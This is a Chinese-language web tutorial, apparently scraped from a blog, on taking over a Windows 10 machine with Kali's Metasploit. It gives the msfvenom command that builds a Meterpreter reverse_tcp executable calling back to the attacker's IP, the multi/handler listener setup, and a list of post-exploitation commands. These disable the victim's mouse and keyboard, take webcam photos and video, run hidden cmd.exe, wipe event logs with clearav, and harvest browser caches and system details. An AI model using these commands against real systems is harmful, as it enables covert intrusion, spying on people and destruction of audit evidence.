用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据 |
您所在的位置:网站首页 › kali远程桌面连接命令 › 用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据 |
用kali的Meterpreter控制win10,可以偷看你的电脑的所有数据
|
Meterpreter
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。 查看kali和window的ip 在kali终端ifconfig,ip是192.168.0.103 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe生成met.exe可执行的exe,并点击执行。
复制到win10主机,需要关闭window的防火墙
window点击exe前,kali需要进入msfconsole, 5555需要对应 msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.0.103 lhost => 192.168.0.103 msf5 exploit(multi/handler) > set lport 5555 lport => 5555
exploit命令发起攻击 在window桌面不小心放在重要的文件,直接cat查询
补充下,msfconsole的一些命令,只有控制了window,下面的命令都可以执行。 # 让他不能用鼠标 uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl disable keyboard #禁用键盘 # 如果开了摄像头拍照 webcam摄像头命令 webcam_list #查看摄像头 webcam_snap #通过摄像头拍照 webcam_stream #通过摄像头开启视频 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 # clearav清除日志 clearav #清除windows中的应用程序日志、系统日志、安全日志 # 基本网络命令 ipconfig/ifconfig netstat –ano arp getproxy #查看代理信息 route #查看路由 # 信息收集的脚本位于: /usr/share/metasploit-framework/modules/post/windows/gather /usr/share/metasploit-framework/modules/post/linux/gather # 信息收集的脚本较多,仅列几个常用的: run post/windows/gather/checkvm #是否虚拟机 run post/linux/gather/checkvm #是否虚拟机 run post/windows/gather/forensics/enum_drives #查看分区 run post/windows/gather/enum_applications #获取安装软件信息 run post/windows/gather/dumplinks #获取最近的文件操作 run post/windows/gather/enum_ie #获取IE缓存 run post/windows/gather/enum_chrome #获取Chrome缓存 run post/windows/gather/enum_patches #补丁信息 run post/windows/gather/enum_domain #查找域控其实很弄别人是不行的,别人怎么会傻傻的关防火墙。 |
【本文地址】
今日新闻 |
推荐新闻 |